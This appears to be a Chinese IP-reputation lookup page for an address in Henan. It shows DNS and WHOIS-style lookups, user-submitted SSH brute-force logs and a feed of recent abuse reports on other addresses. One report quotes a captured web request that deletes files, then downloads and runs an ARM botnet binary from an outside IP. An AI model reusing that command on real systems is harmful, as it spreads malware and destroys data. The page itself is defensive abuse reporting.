42.231.116.49 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Unicom Henan Province Network

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackspambots	Jul 9 15:43:46 ArkNodeAT sshd\[29326\]: Invalid user mother from 42.231.116.49 Jul 9 15:43:46 ArkNodeAT sshd\[29326\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=42.231.116.49 Jul 9 15:43:49 ArkNodeAT sshd\[29326\]: Failed password for invalid user mother from 42.231.116.49 port 34993 ssh2	2019-07-09 22:33:36

类型

评论内容

时间

attackspambots

Jul  9 15:43:46 ArkNodeAT sshd\[29326\]: Invalid user mother from 42.231.116.49
Jul  9 15:43:46 ArkNodeAT sshd\[29326\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=42.231.116.49
Jul  9 15:43:49 ArkNodeAT sshd\[29326\]: Failed password for invalid user mother from 42.231.116.49 port 34993 ssh2

2019-07-09 22:33:36

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.231.116.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55003
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;42.231.116.49.			IN	A

;; AUTHORITY SECTION:
.			1033	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019070900 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Tue Jul 09 22:33:13 CST 2019
;; MSG SIZE  rcvd: 117

HOST信息:

49.116.231.42.in-addr.arpa domain name pointer hn.kd.ny.adsl.

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
49.116.231.42.in-addr.arpa	name = hn.kd.ny.adsl.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
78.85.4.25	attackspambots	Honeypot attack, port: 445, PTR: d25.sub4.net78.udm.net.	2020-09-09 02:34:05
202.137.20.53	attackbotsspam	SSH Brute-Forcing (server2)	2020-09-09 02:38:46
192.241.227.136	attackspambots	MultiHost/MultiPort Probe, Scan, Hack -	2020-09-09 03:01:20
23.129.64.201	attack	Sep 8 20:34:29 itv-usvr-01 sshd[28366]: Invalid user admin from 23.129.64.201 Sep 8 20:34:30 itv-usvr-01 sshd[28366]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=23.129.64.201 Sep 8 20:34:29 itv-usvr-01 sshd[28366]: Invalid user admin from 23.129.64.201 Sep 8 20:34:32 itv-usvr-01 sshd[28366]: Failed password for invalid user admin from 23.129.64.201 port 26531 ssh2	2020-09-09 02:38:19
109.191.130.71	attackbots	Honeypot attack, port: 445, PTR: pool-109-191-130-71.is74.ru.	2020-09-09 02:56:57
218.92.0.165	attackspambots	Sep 8 20:41:35 markkoudstaal sshd[4295]: Failed password for root from 218.92.0.165 port 18309 ssh2 Sep 8 20:41:39 markkoudstaal sshd[4295]: Failed password for root from 218.92.0.165 port 18309 ssh2 Sep 8 20:41:42 markkoudstaal sshd[4295]: Failed password for root from 218.92.0.165 port 18309 ssh2 Sep 8 20:41:46 markkoudstaal sshd[4295]: Failed password for root from 218.92.0.165 port 18309 ssh2 ...	2020-09-09 02:44:40
114.104.130.57	attackspam	Lines containing failures of 114.104.130.57 (max 1000) Sep 7 16:09:04 nexus sshd[14633]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.104.130.57 user=r.r Sep 7 16:09:06 nexus sshd[14633]: Failed password for r.r from 114.104.130.57 port 50502 ssh2 Sep 7 16:09:07 nexus sshd[14633]: Received disconnect from 114.104.130.57 port 50502:11: Bye Bye [preauth] Sep 7 16:09:07 nexus sshd[14633]: Disconnected from 114.104.130.57 port 50502 [preauth] Sep 7 16:21:17 nexus sshd[14696]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.104.130.57 user=r.r Sep 7 16:21:19 nexus sshd[14696]: Failed password for r.r from 114.104.130.57 port 38177 ssh2 Sep 7 16:21:19 nexus sshd[14696]: Received disconnect from 114.104.130.57 port 38177:11: Bye Bye [preauth] Sep 7 16:21:19 nexus sshd[14696]: Disconnected from 114.104.130.57 port 38177 [preauth] Sep 7 16:26:26 nexus sshd[14898]: pam_unix(sshd:a........ ------------------------------	2020-09-09 02:53:01
173.236.255.123	attackbots	xmlrpc attack	2020-09-09 03:00:52
197.42.214.178	attackspam	webserver:80 [07/Sep/2020] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws HTTP/1.1" 404 397 "-" "Hello, world"	2020-09-09 02:33:25
46.105.253.50	attackspambots	IP: 46.105.253.50 Ports affected Simple Mail Transfer (25) Abuse Confidence rating 19% ASN Details AS16276 OVH SAS France (FR) CIDR 46.105.0.0/16 Log Date: 8/09/2020 7:03:02 AM UTC	2020-09-09 02:53:31
178.62.115.86	attack	Fail2Ban Ban Triggered (2)	2020-09-09 02:36:13
185.127.24.39	attackbotsspam	IP: 185.127.24.39 Ports affected Simple Mail Transfer (25) Message Submission (587) Abuse Confidence rating 100% Found in DNSBL('s) ASN Details AS204490 Kontel LLC Russia (RU) CIDR 185.127.24.0/22 Log Date: 8/09/2020 1:32:55 PM UTC	2020-09-09 02:50:16
81.192.8.14	attack	Sep 8 19:33:07 home sshd[1296706]: Failed password for invalid user cristopher from 81.192.8.14 port 53138 ssh2 Sep 8 19:37:01 home sshd[1297074]: Invalid user tests1 from 81.192.8.14 port 57782 Sep 8 19:37:01 home sshd[1297074]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=81.192.8.14 Sep 8 19:37:01 home sshd[1297074]: Invalid user tests1 from 81.192.8.14 port 57782 Sep 8 19:37:03 home sshd[1297074]: Failed password for invalid user tests1 from 81.192.8.14 port 57782 ssh2 ...	2020-09-09 02:45:26
49.233.111.193	attackspam	[N10.H2.VM2] Port Scanner Detected Blocked by UFW	2020-09-09 03:02:05
220.244.58.58	attackbots	220.244.58.58 (AU/Australia/-), 6 distributed sshd attacks on account [root] in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_DISTATTACK; Logs: Sep 8 18:40:53 server sshd[8432]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212.145.192.205 user=root Sep 8 18:40:55 server sshd[8432]: Failed password for root from 212.145.192.205 port 48308 ssh2 Sep 8 18:30:53 server sshd[7016]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.158.189.0 user=root Sep 8 18:30:55 server sshd[7016]: Failed password for root from 51.158.189.0 port 53102 ssh2 Sep 8 18:47:08 server sshd[9267]: Failed password for root from 220.244.58.58 port 59568 ssh2 Sep 8 18:49:47 server sshd[9589]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.5.157.124 user=root IP Addresses Blocked: 212.145.192.205 (ES/Spain/-) 51.158.189.0 (FR/France/-)	2020-09-09 02:54:17

最近上报的IP列表

93.81.20.142	122.96.215.75	49.90.179.178	5.35.9.56
182.30.212.111	114.233.110.131	37.53.70.64	122.154.63.250
77.42.117.78	145.255.0.125	42.81.117.178	90.64.137.225
27.72.137.240	157.230.98.238	64.52.101.194	223.206.242.114
158.174.113.97	179.246.161.237	14.215.176.15	14.215.176.17